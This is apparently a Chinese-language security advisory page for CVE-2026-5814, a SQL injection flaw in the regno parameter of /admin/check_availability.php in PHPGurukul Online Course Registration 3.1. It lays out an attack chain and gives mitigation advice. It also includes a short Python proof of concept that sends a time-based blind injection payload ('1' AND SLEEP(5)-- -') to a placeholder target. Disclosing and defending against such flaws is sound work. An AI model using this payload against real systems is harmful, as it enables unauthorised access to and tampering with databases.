CVE-2026-5814 CVSS 7.3 高危

CVE-2026-5814 PHPGurukul在线课程注册系统SQL注入漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5814

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PHPGurukul Online Course Registration

漏洞概述

PHPGurukul Online Course Registration 3.1版本中发现了一处高危安全漏洞。问题出在/admin/check_availability.php文件中，由于对用户输入的regno参数缺乏严格的过滤，导致存在SQL注入漏洞。未经身份验证的攻击者可通过网络远程利用此漏洞，执行恶意SQL语句。成功利用可能导致敏感数据库信息泄露、数据被篡改或破坏，对系统的机密性、完整性和可用性造成严重影响。

技术细节

该漏洞源于PHPGurukul Online Course Registration 3.1版本的/admin/check_availability.php文件中存在输入验证缺失。具体而言，当应用程序处理用户提交的“regno”参数时，未对该参数进行严格的类型检查或特殊字符过滤，而是直接将其拼接至SQL查询语句中执行。这种不安全的编码方式使得攻击者能够通过构造包含恶意SQL代码的HTTP请求（例如使用单引号闭合查询并追加UNION SELECT语句），诱导后端数据库执行非预期的命令。由于CVSS向量显示无需用户交互（UI:N）且无需权限（PR:N），攻击者可远程发起攻击。成功利用此漏洞可能导致数据库中的敏感信息（如用户凭证、课程数据）被窃取，甚至导致服务器被完全控制。

攻击链分析

STEP 1

侦察

攻击者识别出目标服务器运行的是PHPGurukul Online Course Registration 3.1版本，并定位到/admin/check_availability.php接口。

STEP 2

武器化

攻击者构造针对regno参数的恶意SQL Payload，例如用于布尔盲注、时间盲注或联合查询的语句。

STEP 3

交付

攻击者向目标服务器发送HTTP GET或POST请求，将包含恶意Payload的regno参数传递给后端接口。

STEP 4

利用

后端数据库接收到未经过滤的参数，直接执行攻击者注入的SQL命令，导致数据查询逻辑被篡改。

STEP 5

影响

攻击者成功获取数据库敏感信息（如用户名、密码哈希），或者篡改、删除数据，导致系统服务受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL configuration
target_url = "http://target.com/admin/check_availability.php"

# SQL Injection Payload
# Attempting to bypass logic or extract data using time-based injection
payload = "1' AND SLEEP(5)-- -"

params = {
    "regno": payload
}

try:
    # Send malicious request
    response = requests.get(target_url, params=params, timeout=10)
    
    # Analyze response time or content to confirm vulnerability
    if response.elapsed.total_seconds() >= 5:
        print("[+] SQL Injection Vulnerability Confirmed (Time-based)")
    else:
        print("[-] Vulnerability not confirmed or patch applied")
        
except requests.RequestException as e:
    print(f"[!] Error connecting to target: {e}")

影响范围

PHPGurukul Online Course Registration 3.1

防御指南

临时缓解措施

建议立即检查并修改/admin/check_availability.php源代码，使用PDO或mysqli预处理语句代替直接拼接SQL。在未修复前，建议通过WAF等安全设备拦截包含特殊SQL字符（如单引号、注释符）的请求，或暂时在应用层限制对该文件的访问权限。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5814
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5814
3 Details https://www.cvedetails.com/cve/CVE-2026-5814/
4 VulDB https://vuldb.com/cve/CVE-2026-5814
5 Link https://github.com/f1rstb100d/CVE/issues/21
6 Link https://phpgurukul.com/
7 Link https://vuldb.com/submit/787698
8 Link https://vuldb.com/vuln/356262
9 Link https://vuldb.com/vuln/356262/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表